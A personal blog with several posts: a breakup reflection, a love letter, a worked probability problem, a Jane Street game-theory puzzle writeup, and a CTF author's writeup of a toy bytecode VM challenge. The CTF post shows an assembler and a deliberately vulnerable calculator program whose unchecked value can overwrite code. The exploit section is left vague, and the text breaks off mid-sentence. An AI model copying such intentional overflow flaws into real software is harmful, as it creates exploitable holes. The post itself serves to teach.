kek :D

On Loss and Love

kek — Wed, 21 Jan 2026 00:00:00 GMT

Recently, I lost what I previously thought was the love of my life.
The experience changed the lens through which I view relationships and my life.
I have hesitated to post this for a long time, but this is the (uninspiring) story of a lost soul's first venture into love.

The beginning

They say that love always comes when you least expect it, and I have found this to be true.
I stepped into my first year of junior college just after recovering from the heartbreak of an unrequited love. Finding a relationship was the last thing on my mind.
To make matters worse, I had been brutally butchered by a barber just before my first week of school, and boy, that head of hair was definitely not helping my chances.

I first started talking to Feilin over text one day, after asking her what was probably a mathematics question.
From that day on, we started texting often. At that point in time, I had a crush on another girl in my class and therefore didn't really think much about it.
Besides, she was the type of girl to have many male friends (being in a male-dominated computing class helped), and the only thing I thought about it was "dang, does this girl have no other better things to do?"

Soon after, however, I lost interest in the other girl and was a free agent.
Feilin and I were in the same class and the same H2 Project Work group, and worked on the same external research project. Therefore, we had no shortage of opportunities to see each other.
I distinctly remember, however, the first time we spent time alone together.
The external research project had a package that required us to run a Linux distro, and she had no idea how Linux worked or how to dual boot Windows and Ubuntu on her laptop.
I, ever the opportunist, offered to help her at my place.

I still remember questioning her choice of partitioning her disk into two, with her response being "my friend said that it would make it faster".
To this day, I think she still runs that accursed setup.

Naturally, that experience was EXTREMELY awkward, but I remember that we shared a hug before she headed home. I hugged all my close friends at that point, but when I first hugged her, something felt off.
Something felt different about the hug - not that it was awkward, or wrong, or weird, but that it conveyed a different message.

In the weeks that followed, I wrestled a lot with my feelings. I had initially dismissed the idea of dating her, but now thoughts of it were creeping into the back of my mind.
Eventually, I went out with her a couple of times, and after she started resting her head on my shoulder during movies and lunch (cringe!), I knew that it was only a matter of time before I asked her out.

Not long after, having watched Jurassic Park at Suntec City, I finally asked her to be my girlfriend whilst walking her back to HCI Boarding School.

A Short Probability Problem

kek — Mon, 26 Jan 2026 00:00:00 GMT

The problem

Given a1 ~ Unif(0,1), a2 ~ Unif(0,2), a3 ~ Unif(0,3), a4 ~ Unif(0,4) and a5 ~ Unif(0,5), what is P(a1 <= a2 <= a3 <= a4 <= a5)?

I recently saw this problem in an Instagram reel, and after some help from a friend (thanks zhi!) and over an hour of struggling with it, I finally (roughly) understand how to approach it!

Note: I am extremely unfamiliar with math in general, so some things were extremely foreign to me.

Mistakes

I have solved a similar problem before (Jane Street Dec 2025, writeup coming!) where we had to calculate something like P(a1 <= a2).
One way to approach this is geometrically (groan).

As you can see, the square represents the space of all possible combinations of (a1,a2).
Therefore, if we want to find the probability that a1 <= a2, we can simply take (area where a1 <= a2) / (total area).
With this in mind, $P(a_1 \leq a_2) = \frac{\frac{1}{2} \cdot 1 \cdot 1}{1 \cdot 1} = 0.5$

Therefore, a natural follow-up when there are more a_i would be to extend this thinking into a higher-dimensional space.
This 5D box would have volume 1 x 2 x 3 x 4 x 5 = 120 (the product of the ranges of a1 through a5).
Then we should ask ourselves: what hyper-volume of this space represents the set of (a1,a2,a3,a4,a5) where a1 <= a2 <= a3 <= a4 <= a5?
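Before doing any calculus, a quick simulation gives a number to aim for. This is a minimal Monte Carlo sketch (not part of the original approach; the function name, sample count and seed are my own choices): it samples points uniformly from the 1 x 2 x 3 x 4 x 5 box and counts the fraction that satisfy the ordering, which is exactly the hyper-volume ratio described above.

```python
import random


def estimate_ordered_probability(n_vars=5, trials=100_000, seed=0):
    """Monte Carlo estimate of P(a1 <= a2 <= ... <= an) with a_i ~ Unif(0, i).

    Equivalently, the fraction of the box [0,1] x [0,2] x ... x [0,n]
    occupied by points that satisfy the ordering.
    """
    rng = random.Random(seed)  # seeded so the estimate is reproducible
    hits = 0
    for _ in range(trials):
        # draw one point uniformly from the box
        point = [rng.uniform(0, i) for i in range(1, n_vars + 1)]
        # count it if every coordinate is <= the next one
        if all(point[j] <= point[j + 1] for j in range(n_vars - 1)):
            hits += 1
    return hits / trials


print(estimate_ordered_probability())
```

The estimate should land close to the exact value derived later in the post; with 100,000 samples the statistical error is roughly 0.001.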

PS: it is probably not important to read past here if you are merely trying to understand the solution. This is more of a "for myself" section.

As a professionally-terrible-at-geometry enjoyer, I was already getting lost here. No matter, ChatGPT to the rescue!

Now, ChatGPT 5.2 thinking suggested that I start from a1 and integrate my way up to a5. Sounds reasonable.
Therefore, let $v_1(u)$ be the length (1-D volume) of the set of choices for $a_1$ given $a_2 = u$.
More generally, $v_n(u)$ is the n-D volume of the set of choices for $(a_1, a_2, \dots, a_n)$ given that $a_{n+1} = u$.

To find the resultant volume, we would simply evaluate $\int_0^5 v_4(u)\,du$.

Let us now try this.
Given $a_2 = u$, $a_1$ can lie anywhere in the interval $[0, \min(1,u)]$.
Therefore, $v_1(u) = \int_0^{\min(1,u)} 1\,dt = \min(1,u)$

Then, given that $a_3 = u$, $v_2(u) = \int_0^{\min(2,u)} v_1(t)\,dt$

To compute this integral, we would now have to split between the cases where $0 \leq u \leq 1$, $1 \leq u \leq 2$, $2 \leq u \leq 3$ and then for each of these cases, there are subcases for the ranges of t as well.

This quickly becomes a mess of piecewise functions and feels terrible to calculate. There has to be a better way!

The better way

Previously, we attempted to integrate from the bottom up, starting with a1 and working our way up to a5.
The problem we faced was that each function was dependent on the functions before it, and therefore dependent on the bounds of each random variable before it.
This "stacking" of piecewise functions caused an explosion in the number of terms we had to evaluate, as we had to "update" the "state" of each integral with the potential states of past integrals.

What if we integrate from the top down instead? If we start by integrating over $a_5$, which only depends on $a_4$ (as $a_4$ implicitly "encodes" the information of $a_3, a_2, a_1$), we might not need to deal with this issue.

Our goal stays the same: to view the set of all $(a_1,a_2,a_3,a_4,a_5)$ as a 5D space, and to find the hyper-volume of the region where $a_1 \leq a_2 \leq a_3 \leq a_4 \leq a_5$.

Let us start with $a_5$.
The "length" of values that $a_5$ can take is $5 - a_4$.
This is because $0 \leq a_5 \leq 5$ and $a_4 \leq a_5$.
Another way to think about this is that the 1-D volume that $a_5$ can take is given by the integral
$$ \begin{aligned} &V(a_5) = \int_{a_4}^{5} 1\,da_5 = 5 - a_4 \end{aligned} $$

Therefore, the 2-D volume that is given by the set of valid $(a_5,a_4)$ values is
$$ \begin{aligned} &V(a_5,a_4) = \int_{a_3}^{4} (5 - a_4)\,da_4 = 12 - 5a_3 + \frac{1}{2}{a_3}^2 \end{aligned} $$

This is because $0 \leq a_4 \leq 4$ and $a_3 \leq a_4$.
Therefore, by integrating the length of $a_5$ over the values of $a_4$, we can find the area.
Here is the key observation: the range of valid values for $a_n$ depends solely on the value of $a_{n-1}$! This is because, for $a_{n-1}$ to be part of a valid solution, the constraints on $a_1, \dots, a_{n-2}$ must already have been fulfilled. Moreover, since $a_{n-1} \leq n-1 < n$, the interval $[a_{n-1}, n]$ is never empty, so none of the min/max case splits from before appear.

Next, we find the 3-D volume that is given by the set of valid $(a_5,a_4,a_3)$ values, with the same set of reasoning as before
$$ \begin{aligned} &V(a_5,a_4,a_3) = \int_{a_2}^{3} \left(12 - 5a_3 + \frac{1}{2}{a_3}^2\right) da_3 = \dots = 18 - 12a_2 + \frac{5}{2}{a_2}^2 - \frac{1}{6}{a_2}^3 \end{aligned} $$

Now, for the 4-D volume that is given by the set of valid $(a_5,a_4,a_3,a_2)$ values, with the same set of reasoning as before
$$ \begin{aligned} &V(a_5,a_4,a_3,a_2) = \int_{a_1}^{2} \left(18 - 12a_2 + \frac{5}{2}{a_2}^2 - \frac{1}{6}{a_2}^3\right) da_2 = \dots = 18 - 18a_1 + 6{a_1}^2 - \frac{5}{6}{a_1}^3 + \frac{1}{24}{a_1}^4 \end{aligned} $$

And finally, for the 5-D volume that is given by the set of valid $(a_5,a_4,a_3,a_2,a_1)$ values
$$ \begin{aligned} &V(a_5,a_4,a_3,a_2,a_1) = \int_{0}^{1} \left(18 - 18a_1 + 6{a_1}^2 - \frac{5}{6}{a_1}^3 + \frac{1}{24}{a_1}^4\right) da_1 = 18 - 9 + 2 - \frac{5}{24} + \frac{1}{120} = \frac{54}{5} \end{aligned} $$

And to arrive at the final answer, $$ \begin{aligned} &P(a_5\geq a_4\geq a_3\geq a_2\geq a_1) = \frac{\frac{54}{5}}{120} = \frac{9}{100} = 0.09 = 9\% \end{aligned} $$
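The whole top-down integration can be replayed exactly in a few lines. In this sketch (the helper names are my own), each polynomial is a list of `Fraction` coefficients, and the loop integrates from $a_5$ down to $a_1$, producing the same intermediate polynomials as the derivation above before dividing by the box volume $n!$.

```python
from fractions import Fraction
from math import factorial


def integrate_from(poly, upper):
    """Coefficients (in the lower limit s) of the integral from s to `upper` of poly(t) dt.

    `poly` is a coefficient list [c0, c1, c2, ...] meaning c0 + c1*t + c2*t^2 + ...
    """
    # antiderivative F(t): c_k * t^k integrates to c_k / (k + 1) * t^(k + 1)
    anti = [Fraction(0)] + [Fraction(c) / (k + 1) for k, c in enumerate(poly)]
    # F(upper) is just a number
    f_upper = sum(c * Fraction(upper) ** k for k, c in enumerate(anti))
    # F(upper) - F(s): negate every coefficient, then add F(upper) to the constant term
    result = [-c for c in anti]
    result[0] += f_upper
    return result


def ordered_probability(n):
    """Exact P(a1 <= ... <= an) for a_i ~ Unif(0, i), integrating from a_n down to a_1."""
    poly = [Fraction(1)]  # innermost integrand: 1, integrated over a_n
    for k in range(n, 1, -1):
        # a_k ranges over [a_{k-1}, k]; the result is a polynomial in a_{k-1}
        poly = integrate_from(poly, k)
    # a_1 ranges over [0, 1]; F(1) - F(0) is the constant term of this result
    volume = integrate_from(poly, 1)[0]
    # the box [0,1] x [0,2] x ... x [0,n] has volume n!
    return volume / factorial(n)


print(ordered_probability(5))  # 9/100
```

Calling `integrate_from([Fraction(1)], 5)` returns the coefficients of $5 - a_4$, and each later step matches the corresponding $V(\cdot)$ line above.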

There you have it! Hopefully this was helpful and interesting :D

Dear Favourite Stranger...

kek — Thu, 25 Dec 2025 00:00:00 GMT

Dear favourite stranger,
I have forgotten your touch, your smell, and your taste – but never your love.
You feel so far away yet still so close to my heart.
I know you once truly loved me, as I did you.
I look back with a tear, but also a smile, for the time we had was worth all this while.
Though this might be a last goodbye, your memory will last a lifetime.
Wherever you are, whenever, and with whoever, I wish you all the best.

And so, as my last painful act of love,
I open my hands.
I let you go, my dove.

Robot Javelin: Jane Street December 2025 monthly puzzle

kek — Wed, 07 Jan 2026 00:00:00 GMT

Finally another game theory based puzzle!
As usual, the code can be found here, but you probably won't need it this time around!

Problem Statement

It’s coming to the end of the year, which can only mean one thing: time for this year’s Robot Javelin finals! Whoa wait, you’ve never heard of Robot Javelin? Well then! Allow me to explain the rules:

It’s head-to-head. Each of two robots makes their first throw, whose distance is a real number drawn uniformly from [0, 1].
Then, without knowledge of their competitor’s result, each robot decides whether to keep their current distance or erase it and go for a second throw, whose distance they must keep (it is also drawn uniformly from [0, 1]).
The robot with the larger final distance wins.

This year’s finals pits your robot, Java-lin, against the challenger, Spears Robot. Now, robots have been competing honorably for years and have settled into the Nash equilibrium for this game. However, you have just learned that Spears Robot has found and exploited a leak in the protocol of the game. They can receive a single bit of information telling them whether their opponent’s first throw (distance) was above or below some threshold d of their choosing before deciding whether to go for a second throw. Spears has presumably chosen d to maximize their chance of winning — no wonder they made it to the finals!

Spears Robot isn’t aware that you’ve learned this fact; they are assuming Java-lin is using the Nash equilibrium. If you were to adjust Java-lin’s strategy to maximize its odds of winning given this, what would be Java-lin’s updated probability of winning? Please give the answer in exact terms, or as a decimal rounded to 10 places.

Problem Analysis

Great, another easy-ish game theory problem. This time around, it seems we need to calculate three things:

"base case" Nash equilibrium strategy
fully exploitative leaked strategy
equilibrium strategy with leak

We can probably take things step by step, as each step builds on the result of the previous one.

Base case nash equilibrium

In the base case, the game is a symmetric optimal stopping problem.
That is to say, both players will use the same strategy, with the same cutoff.
With this crucial information in hand (that the optimal strategies are symmetric), our lives get a whole lot easier.

Common pitfalls

A common pitfall here is to treat this as a score optimisation problem.
That is to say, to assume that each player's goal is to maximise their expected score, and that doing so maximises their chance of winning.

Therefore, some might reason that since the EV of a single throw is 0.5, one should reroll whenever the first throw is below 0.5.
The expected distance would then be $E(\text{game}) = 0.5 \cdot \frac{0.5 + 1.0}{2} + 0.5 \cdot 0.5 = 0.625$
Whilst it is true that such a strategy maximises the expected distance, it is logically flawed to extend that line of thought and assume that it also maximises the chance of winning.
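The expected-distance arithmetic can be checked exactly. This is a minimal sketch (the function name is my own) of a "reroll if the first throw is below k" rule: keeping happens with probability $1 - k$ and the kept throw averages $(1 + k)/2$; rerolling happens with probability $k$ and the fresh throw averages $1/2$. For $k = 1/2$ this works out to $5/8 = 0.625$, and a coarse scan confirms that $k = 1/2$ is the distance-maximising threshold.

```python
from fractions import Fraction


def expected_distance(k):
    """Expected final distance when rerolling every first throw below k (throws ~ Unif(0, 1))."""
    k = Fraction(k)
    keep = (1 - k) * (1 + k) / 2  # P(keep) * mean of a throw in [k, 1]
    reroll = k * Fraction(1, 2)   # P(reroll) * mean of a fresh throw
    return keep + reroll


print(expected_distance(Fraction(1, 2)))  # 5/8

# scan thresholds 0.00, 0.01, ..., 1.00 for the distance-maximising one
best = max((Fraction(i, 100) for i in range(101)), key=expected_distance)
print(best)  # 1/2
```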

I struggle to find a convincing intuition for why this is not the case (if someone has one, please do let me know!), but I can attempt to demonstrate it with an example.
Consider the following two scenarios:

Scenario A:

the player rolls a die, which lands on 1 with probability 0.2 and on 0 with probability 0.8
therefore, the EV (in terms of the value of the roll) is 0.2

Scenario B:

the player rolls a die, which lands on 0.1 with probability 1
therefore, the EV is 0.1

As one can see, the EV of scenario B is lower than that of scenario A. However, when the two scenarios (strategies) are pitted against one another in this setting, scenario B comes out victorious 80% of the time (whenever scenario A rolls a 0).
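The two scenarios can also be checked mechanically. In this small sketch (the helper names are hypothetical), each scenario is a `{value: probability}` table, and the code compares each scenario's EV with its head-to-head win probability.

```python
from fractions import Fraction

# Scenario A: 1 with probability 0.2, 0 with probability 0.8
scenario_a = {Fraction(1): Fraction(1, 5), Fraction(0): Fraction(4, 5)}
# Scenario B: 0.1 with probability 1
scenario_b = {Fraction(1, 10): Fraction(1)}


def expected_value(dist):
    return sum(value * prob for value, prob in dist.items())


def win_probability(dist, other):
    """P(a draw from `dist` is strictly larger than an independent draw from `other`)."""
    return sum(p * q for v, p in dist.items() for w, q in other.items() if v > w)


print(expected_value(scenario_a), expected_value(scenario_b))  # 1/5 1/10
print(win_probability(scenario_b, scenario_a))                 # 4/5
```

The higher-EV distribution loses the head-to-head comparison, which is exactly why the win probability (not the raw score) has to be the objective.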

Solving for the base case equilibrium

Therefore, we must approach this problem from a game theoretic perspective.
Hence, all we need to do is reframe what we mean by EV: here, EV should be the probability of winning rather than the raw score. Maximising this value will then suffice.

We know that in equilibrium, Java-lin and Spears Robot must both act in a way that causes the other to be indifferent between actions.
Call the optimal stopping point k (the threshold below which both players should reroll), and the value of the first throw x.
Now, we know that if our first throw is exactly k, the probability of winning should be the same whether we keep or reroll.

Therefore, we can construct the following set of equations
$$ \begin{aligned} &P(\text{win if reroll} \mid x = k) = P(\text{win if keep} \mid x = k) \\
&P(\text{win if reroll} \mid x = k \cap \text{opponent rerolls}) P(\text{opponent rerolls}) + P(\text{win if reroll} \mid x = k \cap \text{opponent keeps}) P(\text{opponent keeps}) \\
&= \\
&P(\text{win if keep} \mid x = k \cap \text{opponent rerolls}) P(\text{opponent rerolls}) + P(\text{win if keep} \mid x = k \cap \text{opponent keeps}) P(\text{opponent keeps}) \\
\end{aligned} $$

Pardon the formatting; I used text instead of purely symbols to keep it more readable.
Now, since we know that the value of k is the same for both players, we can substitute k into each term of the equation and solve for it.
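For completeness, here is my own working of that substitution (not from the original post, so treat it as a sketch). Against an opponent who rerolls below k, the opponent rerolls with probability k and otherwise keeps a distance distributed as Unif(k, 1). Keeping a throw of exactly k wins only if the opponent rerolled and landed below k, giving $k \cdot k$. Rerolling wins with probability 1/2 against a rerolled opponent and $(1-k)/2$ against one who kept, giving $\frac{k}{2} + \frac{(1-k)^2}{2}$. Setting the two equal gives $k^2 + k - 1 = 0$, so $k = \frac{\sqrt{5} - 1}{2} \approx 0.618$. The code below solves the indifference equation numerically by bisection and compares against that closed form.

```python
import math


def win_if_keep(k):
    # we keep a throw of exactly k: we win only if the opponent rerolled (prob k)
    # and their fresh Unif(0, 1) throw landed below k (prob k)
    return k * k


def win_if_reroll(k):
    # opponent rerolled (prob k): two fresh Unif(0, 1) throws, we win half the time
    # opponent kept (prob 1 - k): their distance is Unif(k, 1), beaten w.p. (1 - k) / 2
    return k * 0.5 + (1 - k) * (1 - k) / 2


def solve_threshold(lo=0.0, hi=1.0, iters=100):
    """Bisection on f(k) = win_if_keep(k) - win_if_reroll(k): f(0) < 0 < f(1), f increasing."""
    def f(k):
        return win_if_keep(k) - win_if_reroll(k)

    for _ in range(iters):
        mid = (lo + hi) / 2
        if f(mid) < 0:
            lo = mid
        else:
            hi = mid
    return (lo + hi) / 2


k = solve_threshold()
print(k, (math.sqrt(5) - 1) / 2)
```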

KEKculator

kek — Sat, 26 Jul 2025 00:00:00 GMT

Intro

This is my first blog post, so I thought I would keep it easily digestible :)

For this year's rendition of SieberrCTF 2025, I wrote a byteVM reverse engineering/pwn challenge called "KEKculator", with the intention of giving newer CTF players an introduction to byteVM reversing.
The challenge was used in the qualifying round and got a total of 1 solve, by @azzazo.
Additionally, it was my first time writing any sort of byteVM/RE/pwn challenge, and I'm an RE and pwn noob, so I figured it would be a good opportunity to practice some coding.

I thought that I would approach this writeup from the perspective of creating the challenge first, then present how I envisioned someone with minimal RE experience solving it.
Hopefully this allows for better clarity :grin:

Challenge creation

Architecture

The byteVM acts like a 32-bit CPU, with the following bytecode convention:

opcode (4 bytes)	arg1 (4 bytes)	arg2 (4 bytes)	arg3 (4 bytes)

All the values are big endian and will always be present.

E.g. if the opcode only requires arg1 and arg2, arg3 must still be provided and will simply be ignored.
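One way to see this layout concretely is Python's `struct` module. This is my own sketch of the format described above, not code from the challenge; `encode`/`decode` are hypothetical helper names. It produces the same bytes as the assembler's `pad_bytes` (`to_bytes(4, 'big')`) applied to each field.

```python
import struct

# One instruction = opcode, arg1, arg2, arg3, each a big-endian unsigned 32-bit word.
INSTRUCTION = struct.Struct(">IIII")


def encode(opcode, arg1=0, arg2=0, arg3=0):
    # unused arguments are still emitted (as 0), so every instruction is exactly 16 bytes
    return INSTRUCTION.pack(opcode, arg1, arg2, arg3)


def decode(blob, offset=0):
    # returns (opcode, arg1, arg2, arg3) for the instruction starting at `offset`
    return INSTRUCTION.unpack_from(blob, offset)


jmp = encode(0x0C, 0x7F8)  # jmp 0x7f8 0x0 0x0
print(jmp.hex())           # 0000000c000007f80000000000000000
print(decode(jmp))         # (12, 2040, 0, 0)
```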

The "RAM"/memory is stored in a simple Python list with the following structure:
[
- 0:1000 -> stack
- 1000:1000+len(code) -> code
]

The "stack" grows downward as per common convention.
Additionally, the stack is placed on top of (directly before) the code to allow for the pwn aspect of this challenge (as you'll see later).

Furthermore, there is a bunch of standard-ish registers:
esp, ebp, eip, eax (used for arithmetic calls), edx, ecx, ebx, esi, edi

Opcodes

There are a total of 18 opcodes implemented in the byteVM. Here's a quick list with a brief description of each:

0x00 -> halt (arg1 = exit_code, arg2 = message, arg3 = 0)
0x01 -> add (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x02 -> sub (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x03 -> mul (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x04 -> div (arg1 = dest(register), arg2 = src1, arg3 = src2)
0x05 -> test (arg1 = src1, arg2 = src2, arg3 = 0) -> clears the flags of register tes
0x06 -> jeq (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the eq flag is set (tested equality)
0x07 -> jne (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the neq flag is not set (tested inequality)
0x08 -> jgt (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the greater than flag is set (tested greater than)
0x09 -> jlt (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the less than flag is set (tested less than)
0x0a -> jz (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the zero flag is set (tested equality)
0x0b -> jnz (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps if the zero flag is not set (tested inequality)
0x0c -> jmp (arg1 = offset, arg2 = 0, arg3 = 0) -> jumps unconditionally
0x0d -> push (arg1 = dest(register), arg2 = value)
0x0e -> pop (arg1 = dest(register), arg2 = 0)
0x0f -> store (arg1 = src(register), arg2 = memory addr) -> stores the value of the arg1 register at memory address arg2 (stores unconditionally)
0xff -> nop (arg1 = 0, arg2 = 0, arg3 = 0) -> no operation
0xdd -> syscall (arg1(0=print, 1=read), arg2(register), arg3(register))

Code structure

The full source code can be viewed here
PS: I have done my best to make it readable by adding comments, but I am not too great at writing readable code :stuck_out_tongue:
However, in the interest of keeping this digestible, I shall only provide a layout of the code.

A bunch of helper functions are defined, along with an individual function for each opcode.
The path to a program is passed into the class's init function, which then initializes the registers (stored in a dictionary) and the memory list.

Lastly, a router function gets the instruction at the current EIP (instruction pointer), fills the arg1, arg2 and arg3 registers with the correct data, and calls the function that corresponds to the opcode.
(You may notice that I used a chain of if statements instead of a match-case statement. This is because most Python bytecode decompilers only support Python versions that predate match-case, and I wanted to introduce participants to Python bytecode reversing while keeping that part trivial to reverse, so as to maintain the crux of the challenge.)
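To make the fetch/decode/dispatch idea concrete, here is a heavily trimmed, hypothetical VM. It is not the challenge's source: it implements only add, jmp and halt, uses a `bytearray` rather than a list, routes through a dict instead of the if-chain, and assumes (`CODE_BASE = 1000`) that code is loaded right after a 1000-slot stack with jump targets as absolute addresses. The operand rule (a register name encoded as ASCII, as the assembler does, reads that register; anything else is an immediate) is also my assumption.

```python
import struct

INSTRUCTION = struct.Struct(">IIII")  # opcode, arg1, arg2, arg3 as big-endian 32-bit words
CODE_BASE = 1000                      # assumption: code starts right after a 1000-byte stack


def reg(name):
    """Encode a register name the way the assembler does ('ecx' -> 0x656378)."""
    return int(name.encode().hex(), 16)


class TinyVM:
    """Hypothetical, heavily trimmed VM: only add, jmp and halt are implemented."""

    def __init__(self, code: bytes):
        self.memory = bytearray(CODE_BASE) + bytearray(code)
        self.regs = {"eip": CODE_BASE, "ecx": 0, "edx": 0}
        self.running = True
        # router table: opcode -> handler (the challenge itself uses an if-chain)
        self.handlers = {0x00: self.op_halt, 0x01: self.op_add, 0x0C: self.op_jmp}

    def reg_name(self, arg):
        # undo the assembler's ASCII encoding: 0x656378 -> 'ecx'
        return arg.to_bytes(4, "big").lstrip(b"\x00").decode("latin-1")

    def value(self, arg):
        # hypothetical operand rule: known register names read the register, else immediate
        return self.regs.get(self.reg_name(arg), arg)

    def op_add(self, a1, a2, a3):
        self.regs[self.reg_name(a1)] = self.value(a2) + self.value(a3)

    def op_jmp(self, a1, a2, a3):
        self.regs["eip"] = a1  # absolute target address
        return True            # tells run() not to advance eip

    def op_halt(self, a1, a2, a3):
        self.running = False

    def run(self):
        while self.running:
            eip = self.regs["eip"]
            # fetch + decode one 16-byte instruction at eip
            opcode, a1, a2, a3 = INSTRUCTION.unpack_from(self.memory, eip)
            # dispatch to the matching handler
            jumped = self.handlers[opcode](a1, a2, a3)
            if not jumped:
                self.regs["eip"] = eip + INSTRUCTION.size


program = b"".join([
    INSTRUCTION.pack(0x01, reg("ecx"), 0x0, 0x1),                # add ecx 0x0 0x1
    INSTRUCTION.pack(0x01, reg("ecx"), reg("ecx"), reg("ecx")),  # add ecx ecx ecx
    INSTRUCTION.pack(0x0C, CODE_BASE + 4 * 16, 0x0, 0x0),        # jmp over the next instruction
    INSTRUCTION.pack(0x01, reg("ecx"), 0x0, 0x63),               # skipped
    INSTRUCTION.pack(0x00, 0x0, 0x0, 0x0),                       # halt
])
vm = TinyVM(program)
vm.run()
print(vm.regs["ecx"])  # 2
```

A dict-based router keeps each opcode handler isolated; the if-chain in the real challenge does the same job, just in a form that decompiles trivially.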

Writing a vulnerable program

The vulnerable program that runs server-side is a calculator: it loads the value 1 into a register, takes in an instruction and an operand, performs the corresponding operation on the current register value and the provided operand, and saves the result back into the register.

When the "done" instruction is received, it stores the value of the register into the stack and prints the bytes of the value.

I was going to write the bytecode by hand initially, but due to time constraints I decided on writing an assembler to speed up this process.

with open('exploit.asm') as f:
    asm = f.readlines()

asm = [line.strip() for line in asm if line[0] != '#' and line != '\n'  ]

bytecode = b''

opcode_to_byte = {
    'halt':   0x00,
    'add':    0x01,
    'sub':    0x02,
    'mul':    0x03,
    'div':    0x04,
    'test':   0x05,
    'jeq':    0x06,
    'jne':    0x07,
    'jgt':    0x08,
    'jlt':    0x09,
    'jz':     0x0a,
    'jnz':    0x0b,
    'jmp':    0x0c,
    'push':   0x0d,
    'pop':    0x0e,
    'store': 0x0f,
    'syscall': 0xdd,
    'nop':    0xff
}

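def arg_to_bytes(arg):
    # hex literals ('0x...') are parsed as numbers; anything else (register
    # names like 'edx', or 4-character strings like 'Welc') is encoded as its ASCII bytes
    if arg[:2] == '0x':
        arg = int(arg, 16)

    else:
        arg = int(arg.encode().hex(),16)

    return arg

def pad_bytes(arg):
    # every field is a 4-byte big-endian word
    return arg.to_bytes(4, 'big')

for line in asm:
    # each line is "<opcode> <arg1> <arg2> <arg3>", separated by single spaces
    opcode, arg1, arg2, arg3 = line.split(' ')
    opcode = opcode_to_byte[opcode]

    arg1, arg2, arg3 = arg_to_bytes(arg1), arg_to_bytes(arg2), arg_to_bytes(arg3)

    # one instruction = opcode + 3 args = 16 bytes
    bytecode += pad_bytes(opcode) + pad_bytes(arg1) + pad_bytes(arg2) + pad_bytes(arg3)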

with open('exploit.bin', 'wb') as f:
    f.write(bytecode)

Here is the code for the simple assembler that I wrote.

With this, I created the following assembly:

# simple program to write a string to the stack (starts from 0:1000) and then print it out



# we need to first print out the string "Welcome to KEKulator PRO!"
add edx Welc 0x0
push edx 0x0 0x0
add edx 0x6f6d6520 0x0
push edx 0x0 0x0
add edx 0x746f204b 0x0
push edx 0x0 0x0
add edx 0x454b756c 0x0
push edx 0x0 0x0
add edx 0x61746f72 0x0
push edx 0x0 0x0
add edx 0x2050524f 0x0
push edx 0x0 0x0
add edx 0x21000000 0x0
push edx 0x0 0x0
add edx 0x0 0x0
syscall 0x0 edx 0x0

# print "Your starting number: 1!"
add edx Your 0x0
push edx 0x0 0x0
add edx 0x20737461 0x0
push edx 0x0 0x0
add edx 0x7274696e 0x0
push edx 0x0 0x0
add edx 0x67206e75 0x0
push edx 0x0 0x0
add edx 0x6d626572 0x0
push edx 0x0 0x0
add edx 0x3a203121 0x0
push edx 0x0 0x0
add edx 0x0 0x0
push edx 0x0 0x0
add edx 0x1c 0x0
syscall 0x0 edx 0x0


# print "This is a blackbox so I won't tell you what to do...teehee"

add edx 0x54686973 0x0
push edx 0x0 0x0
add edx 0x20697320 0x0
push edx 0x0 0x0
add edx 0x6120626c 0x0
push edx 0x0 0x0
add edx 0x61636b62 0x0
push edx 0x0 0x0
add edx 0x6f782073 0x0
push edx 0x0 0x0
add edx 0x6f204920 0x0
push edx 0x0 0x0
add edx 0x776f6e27 0x0
push edx 0x0 0x0
add edx 0x74207465 0x0
push edx 0x0 0x0
add edx 0x6c6c2079 0x0
push edx 0x0 0x0
add edx 0x6f752077 0x0
push edx 0x0 0x0
add edx 0x68617420 0x0
push edx 0x0 0x0
add edx 0x746f2064 0x0
push edx 0x0 0x0
add edx 0x6f2e2e2e 0x0
push edx 0x0 0x0
add edx 0x74656568 0x0
push edx 0x0 0x0
add edx 0x65650000 0x0
push edx 0x0 0x0
add edx 0x38 0x0
syscall 0x0 edx 0x0

# set ecx to 1 (ecx holds the calculator's running value)
add ecx 0x0 0x1

# we need to accept the arithmetic instruction (add, sub, mul, div) and a number to operate on ecx

# call read to read 4 bytes into edx (the instruction to run)
syscall 0x1 edx 0x0

# test for "add "
add ebx 0x61646420 0x0
test ebx edx 0x0
# if equal, jump to arithmetic function
jeq 0x8f8 0x0 0x0

# test for "sub "
add ebx 0x73756220 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x928 0x0 0x0

# test for "mul "
add ebx 0x6d756c20 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x958 0x0 0x0

# test for "div "
add ebx 0x64697620 0x0
test ebx edx 0x0
# if  equal, jump to arithmetic function
jeq 0x988 0x0 0x0


# test for "done"
add ebx 0x646f6e65 0x0
test ebx edx 0x0
# if  equal, jump to done function
jeq 0x9b8 0x0 0x0

# add function
# call read to read 4 bytes into edx (the value to add)
syscall 0x1 edx 0x0
add ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# sub function
# call read to read 4 bytes into edx(the value to sub)
syscall 0x1 edx 0x0
sub ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# mul function
# call read to read 4 bytes into edx(the value to mul)
syscall 0x1 edx 0x0
mul ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# div function
# call read to read 4 bytes into edx(the value to div)
syscall 0x1 edx 0x0
div ecx ecx edx
# jump back to input function
jmp 0x7f8 0x0 0x0

# done function
# store the value of ecx onto the stack
store ecx 0x74 0x0
# print the value that was stored
add ecx 0x0 0x74
syscall 0x0 ecx 0x0
# halt the program
halt 0x0 0x0 0x0

PS: The keen-eyed among you might have noticed that I (definitely intentionally) left out functionality to do something like mov eax 0x10.
Therefore, to "move" a value into a register, one must do something like add eax 0x0 <value>.

The exploit

As there is a current writeup competition going on, I shall make this section purposefully vague for the time being till the deadline has been reached. Additionally, I will not include the section on how I believe a beginner contestant can solve the challenge till then.

The vulnerability of the program stems from the fact that there is no bounds check on the value in the ecx register.
Additionally, the store instruction stores a value of arbitrary size into the stack.
Therefore, if we can execute a sequence of arithmetic operations such that, when the store instruction is called, it writes a huge value onto the stack that:

